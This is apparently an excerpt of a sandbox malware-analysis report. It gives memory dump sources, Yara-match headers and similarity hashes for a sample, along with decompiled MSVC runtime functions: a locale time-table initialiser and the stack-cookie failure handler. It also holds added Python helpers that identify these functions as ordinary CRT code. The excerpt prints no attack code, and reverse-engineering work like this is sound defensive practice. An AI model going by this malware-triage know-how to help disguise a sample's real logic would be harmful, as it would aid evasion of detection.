• Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
Similarity
• API ID: AllocGlobal
• String ID:
• API String ID: 3761449716-0
• Opcode ID: 72524da2900f049b8a321b9b16ef014963af8b60a72fdfe0f35524307ca8bb51
• Instruction ID: 754069fd4dd2cbc1cb21bf0d6498f86f96bdf3b8d3463e1c44aead12c4089d80
• Opcode Fuzzy Hash: 72524da2900f049b8a321b9b16ef014963af8b60a72fdfe0f35524307ca8bb51
• Instruction Fuzzy Hash: 72B01275508200CBCB800F51AC047003EB4A308713F00013DF704461F0CB310000EF08
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

C-Code - Quality: 100%
			// Statically linked MSVC CRT code, not sample-specific logic: this matches the CRT's __init_time(),
			// which fills the __lc_time_data table (pointed to by __esi) through __getlocaleinfo (E0040B476 here;
			// see the API ID below). __eax is the threadlocinfo; _v20/_v16 form the _locale_tstruct {locinfo, mbcinfo}
			// whose address is passed on every call. The fifth argument is an LCTYPE from winnls.h:
			// 0x31-0x37 LOCALE_SABBREVDAYNAME1-7, 0x2a-0x30 LOCALE_SDAYNAME1-7, 0x44-0x4f LOCALE_SABBREVMONTHNAME1-12,
			// 0x38-0x43 LOCALE_SMONTHNAME1-12, 0x28/0x29 LOCALE_S1159/LOCALE_S2359, 0x1f/0x20 LOCALE_SSHORTDATE/LOCALE_SLONGDATE,
			// 0x1003 LOCALE_STIMEFORMAT, 0x1009 LOCALE_ICALENDARTYPE. The third argument selects a string (1) or
			// integer (0) lookup; the sixth is the slot in the table that receives the result.
			E0040C762(signed int __eax, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _t142;
				signed int _t145;
				signed int _t148;
				signed int _t151;
				signed int _t154;
				signed int _t157;
				signed int _t159;
				signed int _t162;
				signed int _t165;
				signed int _t168;
				signed int _t171;
				signed int _t174;
				signed int _t177;
				signed int _t180;
				signed int _t183;
				signed int _t186;
				signed int _t189;
				signed int _t192;
				signed int _t195;
				signed int _t198;
				signed int _t201;
				signed int _t204;
				signed int _t207;
				signed int _t210;
				signed int _t213;
				signed int _t216;
				signed int _t219;
				signed int _t222;
				signed int _t225;
				signed int _t228;
				signed int _t231;
				signed int _t234;
				signed int _t237;
				signed int _t240;
				signed int _t243;
				signed int _t246;
				signed int _t249;
				signed int _t252;
				signed int _t255;
				signed int _t258;
				signed int _t261;
				signed int _t264;
				signed int _t267;
				signed int _t270;
				signed int _t276;
				signed int _t278;   // declaration added: the decompiler uses this below without declaring it
				signed int _t279;   // declaration added: same

				_t278 =  *(__eax + 0x42) & 0x0000ffff;   // lc_id[LC_TIME].wLanguage
				_t279 =  *(__eax + 0x44) & 0x0000ffff;   // lc_id[LC_TIME].wCountry
				_v8 =  *(__eax + 0x42) & 0x0000ffff;     // language id: used for the day, month and AM/PM names
				_v12 =  *(__eax + 0x44) & 0x0000ffff;    // country id: used for the date/time formats and the calendar type
				if(__esi != 0) {
					_v16 = _v16 & 0x00000000;            // _locale_tstruct.mbcinfo = NULL
					_v20 = __eax;                        // _locale_tstruct.locinfo = ploci
					// Abbreviated day names. Windows numbers the days Monday=1 .. Sunday=7 while the CRT keeps Sunday
					// at index 0, so LOCALE_SABBREVDAYNAME1 lands at wday_abbr[1] (+4) and LOCALE_SABBREVDAYNAME7 at wday_abbr[0] (+0).
					_t142 = E0040B476(_t279,  &_v20, 1, _t278, 0x31, __esi + 4);
					_t145 = E0040B476(_t279,  &_v20, 1, _v8, 0x32, __esi + 8);
					_t148 = E0040B476(_t279,  &_v20, 1, _v8, 0x33, __esi + 0xc);
					_t151 = E0040B476(_t279,  &_v20, 1, _v8, 0x34, __esi + 0x10);
					_t154 = E0040B476(_t279,  &_v20, 1, _v8, 0x35, __esi + 0x14);
					_t157 = E0040B476(_t279,  &_v20, 1, _v8, 0x36, __esi + 0x18);
					_t159 = E0040B476(_t279,  &_v20, 1, _v8, 0x37, __esi);
					// Full day names, same rotation: wday[1..6] at +0x20..+0x34, wday[0] (Sunday) at +0x1c.
					_t162 = E0040B476(_t279,  &_v20, 1, _v8, 0x2a, __esi + 0x20);
					_t165 = E0040B476(_t279,  &_v20, 1, _v8, 0x2b, __esi + 0x24);
					_t168 = E0040B476(_t279,  &_v20, 1, _v8, 0x2c, __esi + 0x28);
					_t171 = E0040B476(_t279,  &_v20, 1, _v8, 0x2d, __esi + 0x2c);
					_t174 = E0040B476(_t279,  &_v20, 1, _v8, 0x2e, __esi + 0x30);
					_t177 = E0040B476(_t279,  &_v20, 1, _v8, 0x2f, __esi + 0x34);
					_t180 = E0040B476(_t279,  &_v20, 1, _v8, 0x30, __esi + 0x1c);
					// Abbreviated month names: month_abbr[0..11] at +0x38..+0x64.
					_t183 = E0040B476(_t279,  &_v20, 1, _v8, 0x44, __esi + 0x38);
					_t186 = E0040B476(_t279,  &_v20, 1, _v8, 0x45, __esi + 0x3c);
					_t189 = E0040B476(_t279,  &_v20, 1, _v8, 0x46, __esi + 0x40);
					_t192 = E0040B476(_t279,  &_v20, 1, _v8, 0x47, __esi + 0x44);
					_t195 = E0040B476(_t279,  &_v20, 1, _v8, 0x48, __esi + 0x48);
					_t198 = E0040B476(_t279,  &_v20, 1, _v8, 0x49, __esi + 0x4c);
					_t201 = E0040B476(_t279,  &_v20, 1, _v8, 0x4a, __esi + 0x50);
					_t204 = E0040B476(_t279,  &_v20, 1, _v8, 0x4b, __esi + 0x54);
					_t207 = E0040B476(_t279,  &_v20, 1, _v8, 0x4c, __esi + 0x58);
					_t210 = E0040B476(_t279,  &_v20, 1, _v8, 0x4d, __esi + 0x5c);
					_t213 = E0040B476(_t279,  &_v20, 1, _v8, 0x4e, __esi + 0x60);
					_t216 = E0040B476(_t279,  &_v20, 1, _v8, 0x4f, __esi + 0x64);
					// Full month names: month[0..11] at +0x68..+0x94.
					_t219 = E0040B476(_t279,  &_v20, 1, _v8, 0x38, __esi + 0x68);
					_t222 = E0040B476(_t279,  &_v20, 1, _v8, 0x39, __esi + 0x6c);
					_t225 = E0040B476(_t279,  &_v20, 1, _v8, 0x3a, __esi + 0x70);
					_t228 = E0040B476(_t279,  &_v20, 1, _v8, 0x3b, __esi + 0x74);
					_t231 = E0040B476(_t279,  &_v20, 1, _v8, 0x3c, __esi + 0x78);
					_t234 = E0040B476(_t279,  &_v20, 1, _v8, 0x3d, __esi + 0x7c);
					_t237 = E0040B476(_t279,  &_v20, 1, _v8, 0x3e, __esi + 0x80);
					_t240 = E0040B476(_t279,  &_v20, 1, _v8, 0x3f, __esi + 0x84);
					_t243 = E0040B476(_t279,  &_v20, 1, _v8, 0x40, __esi + 0x88);
					_t246 = E0040B476(_t279,  &_v20, 1, _v8, 0x41, __esi + 0x8c);
					_t249 = E0040B476(_t279,  &_v20, 1, _v8, 0x42, __esi + 0x90);
					_t252 = E0040B476(_t279,  &_v20, 1, _v8, 0x43, __esi + 0x94);
					// AM/PM strings: ampm[0] at +0x98, ampm[1] at +0x9c.
					_t255 = E0040B476(_t279,  &_v20, 1, _v8, 0x28, __esi + 0x98);
					_t258 = E0040B476(_t279,  &_v20, 1, _v8, 0x29, __esi + 0x9c);
					// Short date, long date and time format strings (ww_sdatefmt, ww_ldatefmt, ww_timefmt), looked up with the country id.
					_t261 = E0040B476(_t279,  &_v20, 1, _v12, 0x1f, __esi + 0xa0);
					_t264 = E0040B476(_t279,  &_v20, 1, _v12, 0x20, __esi + 0xa4);
					_t267 = E0040B476(_t279,  &_v20, 1, _v12, 0x1003, __esi + 0xa8);
					_t276 = _v12;
					_t270 = E0040B476(_t279,  &_v20, 0, _t276, 0x1009, __esi + 0xb0);   // integer lookup: ww_caltype
					 *(__esi + 0xac) = _t276;             // ww_lcid = country id
					// Each lookup returns non-zero on failure; the OR of all results is the function's status.
					return _t142 | _t145 | _t148 | _t151 | _t154 | _t157 | _t159 | _t162 | _t165 | _t168 | _t171 | _t174 | _t177 | _t180 | _t183 | _t186 | _t189 | _t192 | _t195 | _t198 | _t201 | _t204 | _t207 | _t210 | _t213 | _t216 | _t219 | _t222 | _t225 | _t228 | _t231 | _t234 | _t237 | _t240 | _t243 | _t246 | _t249 | _t252 | _t255 | _t258 | _t261 | _t264 | _t267 | _t270;
				} else {
					return __eax | 0xffffffff;           // no table to fill: return -1
				}
			}

Instruction addresses 0x0040c76a to 0x0040cb7c, with the else branch at 0x0040c77c to 0x0040c780 (the disassembly column was not extracted; only the addresses survive).

APIs
Memory Dump Source
• Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
• Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
Similarity
• API ID: ___getlocaleinfo
• String ID:
• API String ID: 1937885557-0
• Opcode ID: 9b77c6060859d49e4c24381219a53f6a143864f9a34af445c1ea4ad784b43f42
• Instruction ID: 3724fbcbc1c36c63ff45af41235c8df1d2c90ec33ff3f850299579e7c1f1a0b5
• Opcode Fuzzy Hash: 9b77c6060859d49e4c24381219a53f6a143864f9a34af445c1ea4ad784b43f42
• Instruction Fuzzy Hash: 37E1FFB294060DFEEB11DAE1CC81EFF77BEFB04348F01452AB655E2091EA74AB059764
Uniqueness

Uniqueness Score: -1.00%

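Reading the E0040C762 listing above constant by constant is error-prone, so here is an added triage script (not part of the sandbox report and not the sample's code) that does it mechanically: it parses the E0040B476(...) call lines, names each LCTYPE from winnls.h, and checks that every write lands on the __lc_time_data field the CRT's __init_time() fills with that LCTYPE. It assumes the 32-bit CRT layout of __lc_time_data (seven abbreviated day names, seven day names, twelve abbreviated and twelve full month names, two AM/PM strings, then the three format strings, the LCID and the calendar type, four bytes each) and the page's own decompiler names (E0040B476, _v20, __esi); the SAMPLE listing is constructed from a subset of the call lines above.

```python
"""Added triage helper: not part of the sandbox report or of the sample.

Parses the E0040B476(...) calls of the decompiled listing, names each LCTYPE
from winnls.h and checks the destination against the 32-bit CRT struct
__lc_time_data as filled by the CRT's __init_time(). E0040B476 is the page's
decompiler name for __getlocaleinfo; SAMPLE is built from the page's lines.
"""
from __future__ import annotations

import re
from typing import NamedTuple, Optional

# LCTYPE values from winnls.h for the subset the CRT time-table init uses.
LCTYPE_NAMES = {
    0x1F: "LOCALE_SSHORTDATE", 0x20: "LOCALE_SLONGDATE",
    0x28: "LOCALE_S1159", 0x29: "LOCALE_S2359",
    0x1003: "LOCALE_STIMEFORMAT", 0x1009: "LOCALE_ICALENDARTYPE",
}
for _i in range(7):
    LCTYPE_NAMES[0x2A + _i] = f"LOCALE_SDAYNAME{_i + 1}"
    LCTYPE_NAMES[0x31 + _i] = f"LOCALE_SABBREVDAYNAME{_i + 1}"
for _i in range(12):
    LCTYPE_NAMES[0x38 + _i] = f"LOCALE_SMONTHNAME{_i + 1}"
    LCTYPE_NAMES[0x44 + _i] = f"LOCALE_SABBREVMONTHNAME{_i + 1}"

def lc_time_data_fields() -> dict[int, str]:
    """Byte offset -> field name for the 32-bit CRT struct __lc_time_data."""
    fields, off = {}, 0
    for arr, n in (("wday_abbr", 7), ("wday", 7), ("month_abbr", 12),
                   ("month", 12), ("ampm", 2)):
        for i in range(n):
            fields[off] = f"{arr}[{i}]"
            off += 4
    for scalar in ("ww_sdatefmt", "ww_ldatefmt", "ww_timefmt",
                   "ww_lcid", "ww_caltype"):
        fields[off] = scalar
        off += 4
    return fields

def expected_field(lctype_name: str) -> Optional[str]:
    """Field __init_time() stores an LCTYPE into (day 7 = Sunday goes to index 0)."""
    m = re.fullmatch(r"LOCALE_(SABBREVDAYNAME|SDAYNAME|SABBREVMONTHNAME|SMONTHNAME)(\d+)",
                     lctype_name)
    if m:
        kind, k = m.group(1), int(m.group(2))
        arr = {"SABBREVDAYNAME": "wday_abbr", "SDAYNAME": "wday",
               "SABBREVMONTHNAME": "month_abbr", "SMONTHNAME": "month"}[kind]
        return f"{arr}[{k % 7 if 'DAY' in kind else k - 1}]"
    return {"LOCALE_S1159": "ampm[0]", "LOCALE_S2359": "ampm[1]",
            "LOCALE_SSHORTDATE": "ww_sdatefmt", "LOCALE_SLONGDATE": "ww_ldatefmt",
            "LOCALE_STIMEFORMAT": "ww_timefmt",
            "LOCALE_ICALENDARTYPE": "ww_caltype"}.get(lctype_name)

class LocaleCall(NamedTuple):
    offset: int      # byte offset from __esi, the table being filled
    lctype: int
    name: str        # winnls.h name, or "?" if not in LCTYPE_NAMES
    is_string: bool  # third argument: 1 = string lookup, 0 = integer lookup
    lcid_var: str    # local carrying the LCID (_v8/_t278 for names, _v12/_t276 for formats)

def parse_calls(listing: str, callee: str = "E0040B476") -> list[LocaleCall]:
    pat = re.compile(
        re.escape(callee) + r"\(\s*\w+,\s*&_v20,\s*(?P<kind>[01]),\s*(?P<lcid>\w+),\s*"
        r"(?P<lctype>0x[0-9a-fA-F]+),\s*__esi(?:\s*\+\s*(?P<off>0x[0-9a-fA-F]+|\d+))?\s*\)")
    calls = []
    for m in pat.finditer(listing):
        off = int(m.group("off"), 0) if m.group("off") else 0
        lctype = int(m.group("lctype"), 16)
        calls.append(LocaleCall(off, lctype, LCTYPE_NAMES.get(lctype, "?"),
                                m.group("kind") == "1", m.group("lcid")))
    return calls

def annotate(listing: str) -> list[str]:
    """One line per call: destination offset and field, LCTYPE name, lookup kind."""
    fields = lc_time_data_fields()
    return [f"+0x{c.offset:02x} {fields.get(c.offset, '?'):<14} <- {c.name} "
            f"({'str' if c.is_string else 'int'}, lcid={c.lcid_var})"
            for c in parse_calls(listing)]

def matches_crt_init_time(listing: str) -> bool:
    """True if every call writes its LCTYPE where __init_time() would."""
    fields = lc_time_data_fields()
    calls = parse_calls(listing)
    return bool(calls) and all(
        fields.get(c.offset) == expected_field(c.name)
        and c.is_string == (c.name != "LOCALE_ICALENDARTYPE")
        for c in calls)

# Constructed sample: a subset of the call lines from the listing above.
SAMPLE = """
_t142 = E0040B476(_t279,  &_v20, 1, _t278, 0x31, __esi + 4);
_t159 = E0040B476(_t279,  &_v20, 1, _v8, 0x37, __esi);
_t180 = E0040B476(_t279,  &_v20, 1, _v8, 0x30, __esi + 0x1c);
_t183 = E0040B476(_t279,  &_v20, 1, _v8, 0x44, __esi + 0x38);
_t255 = E0040B476(_t279,  &_v20, 1, _v8, 0x28, __esi + 0x98);
_t261 = E0040B476(_t279,  &_v20, 1, _v12, 0x1f, __esi + 0xa0);
_t267 = E0040B476(_t279,  &_v20, 1, _v12, 0x1003, __esi + 0xa8);
_t270 = E0040B476(_t279,  &_v20, 0, _t276, 0x1009, __esi + 0xb0);
"""

if __name__ == "__main__":
    print("\n".join(annotate(SAMPLE)), matches_crt_init_time(SAMPLE))
```

Run as a script it prints one annotated line per call (for example `+0x00 wday_abbr[0]   <- LOCALE_SABBREVDAYNAME7 (str, lcid=_v8)`) followed by `True`. Pasting all 44 call lines of the listing into SAMPLE keeps matches_crt_init_time() at True; a function that returns False, or that yields `?` for an LCTYPE or a destination, is not the CRT table filler and deserves a closer look.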
Memory Dump Source
• Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
• Instruction ID: eaf62c6864914bc0e88ed60ec8a34ddc5c5bdf86f8541d77a3ba32b213cc6ee4
• Opcode Fuzzy Hash: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
• Instruction Fuzzy Hash: 30525B71D00208DBDF10DFA8D885B9EBBB5FF1430AF148169E819E7251E731AA49CF96
Uniqueness

Uniqueness Score: -1.00%

APIs
• _wcsstr.LIBCMT ref: 0084E72D
• _wcsstr.LIBCMT ref: 0084E756
• _memset.LIBCMT ref: 0084E784
  • Part of subcall function 0088FC0C: std::exception::exception.LIBCMT ref: 0088FC1F
  • Part of subcall function 0088FC0C: __CxxThrowException@8.LIBCMT ref: 0088FC34
  • Part of subcall function 0088FC0C: std::exception::exception.LIBCMT ref: 0088FC4D
  • Part of subcall function 0088FC0C: __CxxThrowException@8.LIBCMT ref: 0088FC62
  • Part of subcall function 0088FC0C: std::regex_error::regex_error.LIBCPMT ref: 0088FC74
  • Part of subcall function 0088FC0C: __CxxThrowException@8.LIBCMT ref: 0088FC82
  • Part of subcall function 0088FC0C: std::exception::exception.LIBCMT ref: 0088FC9B
  • Part of subcall function 0088FC0C: __CxxThrowException@8.LIBCMT ref: 0088FCB0
• _wcsstr.LIBCMT ref: 0084EA0C
• _memset.LIBCMT ref: 0084EE5C
Memory Dump Source
• Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Yara matches
Similarity
• API ID: Exception@8Throw$_wcsstrstd::exception::exception$_memset$std::regex_error::regex_error
• String ID:
• API String ID: 1338678108-0
• Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
• Instruction ID: 8ab0e78bc566e003e482065998cfe3fa510432761bebee36e3d1f6137d85eb19
• Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
• Instruction Fuzzy Hash: B752BD71A0021D9FDF24CF68C895BAEBBF1FF14304F1485A9E84AEB282D7719945CB91
Uniqueness

Uniqueness Score: -1.00%

                                                                                       C-Code - Quality: 85%
                                                                                       			// Decompiler listing as recovered by the sandbox; the comments are editorial.
                                                                                       			// This is the MSVC CRT's stack-cookie check (__security_check_cookie) falling
                                                                                       			// through into the /GS failure handler (__report_gsfailure), not malware-authored
                                                                                       			// logic. The IsDebuggerPresent call below belongs to that CRT routine and does not
                                                                                       			// by itself indicate anti-debugging in the sample.
                                                                                       			E00405246(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                       				intOrPtr _v0;
                                                                                       				void* _v804;
                                                                                       				intOrPtr _v808;
                                                                                       				intOrPtr _v812;
                                                                                       				intOrPtr _t6;
                                                                                       				intOrPtr _t12;
                                                                                       				intOrPtr _t13;
                                                                                       				long _t17;
                                                                                       				intOrPtr _t21;
                                                                                       				intOrPtr _t22;
                                                                                       				intOrPtr _t25;
                                                                                       				intOrPtr _t26;
                                                                                       				intOrPtr _t27;
                                                                                       				intOrPtr* _t31;
                                                                                       				void* _t34;
                                                                                       
                                                                                       				_t27 = __esi;
                                                                                       				_t26 = __edi;
                                                                                       				_t25 = __edx;
                                                                                       				_t22 = __ecx;
                                                                                       				_t21 = __ebx;
                                                                                       				_t6 = __eax;
                                                                                       				_t34 = _t22 -  *0x4ad2a8; // 0xb3b28348  (ecx, the caller's cookie, vs. the global __security_cookie)
                                                                                       				if(_t34 == 0) {
                                                                                       					asm("repe ret"); // cookie intact: "rep ret" is a plain return
                                                                                       				}
                                                                                       				// Cookie mismatch: snapshot the register state into a static x86 CONTEXT
                                                                                       				// whose ContextFlags field lives at 0x4affe8 (SegGs at +0x8c ... SegSs at +0xc8).
                                                                                       				 *0x4b0098 = _t6;   // Eax
                                                                                       				 *0x4b0094 = _t22;  // Ecx
                                                                                       				 *0x4b0090 = _t25;  // Edx
                                                                                       				 *0x4b008c = _t21;  // Ebx
                                                                                       				 *0x4b0088 = _t27;  // Esi
                                                                                       				 *0x4b0084 = _t26;  // Edi
                                                                                       				 *0x4b00b0 = ss;    // SegSs
                                                                                       				 *0x4b00a4 = cs;    // SegCs
                                                                                       				 *0x4b0080 = ds;    // SegDs
                                                                                       				 *0x4b007c = es;    // SegEs
                                                                                       				 *0x4b0078 = fs;    // SegFs
                                                                                       				 *0x4b0074 = gs;    // SegGs
                                                                                       				asm("pushfd");
                                                                                       				_pop( *0x4b00a8);   // EFlags
                                                                                       				 *0x4b009c =  *_t31; // Ebp: saved frame pointer at [ebp] (_t31 is the decompiler's name for ebp)
                                                                                       				 *0x4b00a0 = _v0;   // Eip: return address at [ebp+4], i.e. the function whose cookie failed
                                                                                       				 *0x4b00ac =  &_a4; // Esp: ebp+8
                                                                                       				 *0x4affe8 = 0x10001; // ContextFlags = CONTEXT_CONTROL (CONTEXT_i386 | 1)
                                                                                       				// Static EXCEPTION_RECORD at 0x4aff90.
                                                                                       				 *0x4aff9c =  *0x4b00a0; // ExceptionAddress = Eip
                                                                                       				 *0x4aff90 = 0xc0000409; // ExceptionCode = STATUS_STACK_BUFFER_OVERRUN
                                                                                       				 *0x4aff94 = 1;          // ExceptionFlags = EXCEPTION_NONCONTINUABLE
                                                                                       				// Copy the cookie and its complement to the stack so they survive in a crash dump.
                                                                                       				// 0xb3b28348 ^ 0x4c4d7cb7 == 0xffffffff, which confirms the identification.
                                                                                       				_t12 =  *0x4ad2a8; // 0xb3b28348  (__security_cookie)
                                                                                       				_v812 = _t12;
                                                                                       				_t13 =  *0x4ad2ac; // 0x4c4d7cb7  (__security_cookie_complement)
                                                                                       				_v808 = _t13;
                                                                                       				 *0x4affe0 = IsDebuggerPresent(); // DebuggerWasPresent, consulted again below
                                                                                       				_push(1);
                                                                                       				E0040890D(_t14); // _crt_debugger_hook(_CRT_DEBUGGER_GSFAILURE); _t14 is an undeclared decompiler temporary
                                                                                       				SetUnhandledExceptionFilter(0); // discard any filter the program installed
                                                                                       				_t17 = UnhandledExceptionFilter(0x4a834c); // report through the default filter; 0x4a834c is an EXCEPTION_POINTERS referencing the two records above
                                                                                       				if( *0x4affe0 == 0) {
                                                                                       					_push(1);
                                                                                       					E0040890D(_t17); // second debugger hook only when no debugger was attached at entry
                                                                                       				}
                                                                                       				return TerminateProcess(GetCurrentProcess(), 0xc0000409); // exit code STATUS_STACK_BUFFER_OVERRUN
                                                                                       			}

                                                                                       Instruction addresses (one per decompiled line, per the report's gutter): 0x00405246-0x0040524e, then 0x0040c667-0x0040c761. The listing therefore spans two separate code ranges.

                                                                                      APIs
                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0040C717
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040C72C
                                                                                      • UnhandledExceptionFilter.KERNEL32(004A834C), ref: 0040C737
                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0040C753
                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 0040C75A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
                                                                                       • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
                                                                                       • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
                                                                                       • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
                                                                                       • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
                                                                                       • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 2579439406-0
                                                                                      • Opcode ID: 1566059068d073d66ead22c173aef48cf515cf5e502cffe7051bf17601847ce4
                                                                                      • Instruction ID: 7dd4472b2f6a9c45cdcb576e82f25c5b1c4c1acbed28e8c61e302277d6a1954f
                                                                                      • Opcode Fuzzy Hash: 1566059068d073d66ead22c173aef48cf515cf5e502cffe7051bf17601847ce4
                                                                                      • Instruction Fuzzy Hash: 3D21CCB4804304DFD710EFA8FD89B463BA4FB1A316F50427AE609972A0E7B49985CF5D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%
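
The following Python helper is an added example and is not part of the Joe Sandbox report or of the sample. It turns the triage reasoning for E00405246 into a repeatable check: given a function's "APIs" bullets and its decompiled lines, it looks for the exact __report_gsfailure call order, for a cookie/complement pair among the annotated global loads, and for the STATUS_STACK_BUFFER_OVERRUN literal, and only reports "CRT /GS handler" when all three agree. The sample input lines are copied from the listing above; the function names and the heuristic itself are the editor's, not anything the sandbox provides.

```python
"""Triage helper: recognise the MSVC CRT /GS failure path in decompiler output.

Added example (not from the report or the sample). Input lines are copied from
the E00405246 listing; function names and the heuristic are this example's own.
"""
import re
from itertools import combinations
from typing import Dict, Iterable, List, Tuple

# NTSTATUS the CRT raises and exits with on a stack-cookie mismatch.
STATUS_STACK_BUFFER_OVERRUN = 0xC0000409

# Call order of __report_gsfailure in the x86 MSVC CRT, as the report lists it.
GS_FAILURE_API_SEQUENCE = (
    "IsDebuggerPresent",
    "SetUnhandledExceptionFilter",
    "UnhandledExceptionFilter",
    "GetCurrentProcess",
    "TerminateProcess",
)

# "• IsDebuggerPresent.KERNEL32 ref: 0040C717"  -> ("IsDebuggerPresent", "KERNEL32")
_API_LINE = re.compile(r"^\s*•?\s*([A-Za-z_]\w*)\.([A-Za-z0-9_]+)")
# "_t12 =  *0x4ad2a8; // 0xb3b28348"            -> 0xb3b28348 (value the decompiler saw)
_ANNOTATED_GLOBAL = re.compile(r"\*0x[0-9A-Fa-f]+;\s*//\s*0x([0-9A-Fa-f]+)")
_HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]+)")


def api_sequence(report_lines: Iterable[str]) -> Tuple[str, ...]:
    """API names in listing order, skipping CRT-internal (LIBCMT/LIBCPMT) entries."""
    names: List[str] = []
    for line in report_lines:
        m = _API_LINE.match(line)
        if m and not m.group(2).upper().startswith("LIBC"):
            names.append(m.group(1))
    return tuple(names)


def annotated_global_values(decompiled_lines: Iterable[str]) -> List[int]:
    """Values the decompiler annotated on global loads ("// 0x...")."""
    return sorted({int(m.group(1), 16)
                   for line in decompiled_lines
                   for m in _ANNOTATED_GLOBAL.finditer(line)})


def complement_pairs(values: Iterable[int], bits: int = 32) -> List[Tuple[int, int]]:
    """Pairs (a, b), a < b, with a ^ b == all-ones: the relationship the CRT keeps
    between __security_cookie and __security_cookie_complement."""
    mask = (1 << bits) - 1
    return [(a, b) for a, b in combinations(sorted(set(values)), 2) if a ^ b == mask]


def mentions_literal(decompiled_lines: Iterable[str], value: int) -> bool:
    """True if any hex literal in the listing equals value."""
    return any(int(m.group(1), 16) == value
               for line in decompiled_lines for m in _HEX_LITERAL.finditer(line))


def classify(report_api_lines: Iterable[str],
             decompiled_lines: Iterable[str]) -> Dict[str, object]:
    """All three signals must agree before a function is called the /GS handler."""
    apis = api_sequence(report_api_lines)
    decompiled = list(decompiled_lines)
    pairs = complement_pairs(annotated_global_values(decompiled))
    has_status = mentions_literal(decompiled, STATUS_STACK_BUFFER_OVERRUN)
    return {
        "apis": apis,
        "cookie_pairs": pairs,
        "has_status_stack_buffer_overrun": has_status,
        "is_gs_failure_handler": bool(apis == GS_FAILURE_API_SEQUENCE and pairs and has_status),
    }


# Constructed input: the APIs bullets and four decompiled lines of E00405246, as printed in the report.
E00405246_APIS = [
    "• IsDebuggerPresent.KERNEL32 ref: 0040C717",
    "• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040C72C",
    "• UnhandledExceptionFilter.KERNEL32(004A834C), ref: 0040C737",
    "• GetCurrentProcess.KERNEL32(C0000409), ref: 0040C753",
    "• TerminateProcess.KERNEL32(00000000), ref: 0040C75A",
]
E00405246_DECOMPILED = [
    "_t34 = _t22 -  *0x4ad2a8; // 0xb3b28348",
    " *0x4aff90 = 0xc0000409;",
    "_t12 =  *0x4ad2a8; // 0xb3b28348",
    "_t13 =  *0x4ad2ac; // 0x4c4d7cb7",
]
# Negative case: the single-call function E0040ACAA from the same report.
E0040ACAA_APIS = ["• SetUnhandledExceptionFilter.KERNEL32(Function_0000AC68), ref: 0040ACAF"]

if __name__ == "__main__":
    print(classify(E00405246_APIS, E00405246_DECOMPILED))
    print(classify(E0040ACAA_APIS, []))
```

Requiring the cookie/complement pair as well as the API order matters in practice: a sample can import the same five APIs in the same order in genuinely hand-written code, but it will not also load two globals that XOR to 0xffffffff beside a 0xc0000409 literal unless it is the CRT routine.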

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                      • Instruction ID: 4afe30cc39bab55d9a017095da69e49b77183b3a1d9757eba5c10814733d9cf9
                                                                                      • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                      • Instruction Fuzzy Hash: C0525B71E00219DFDB10DBA8C885FAEBBB4FF49304F148198E509EB291DB74AD45CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                                                                                      • Instruction ID: c8c9522d7c938098fa92c60d8f1ac8529af7a3be5aea936579ceedac19ca9f2a
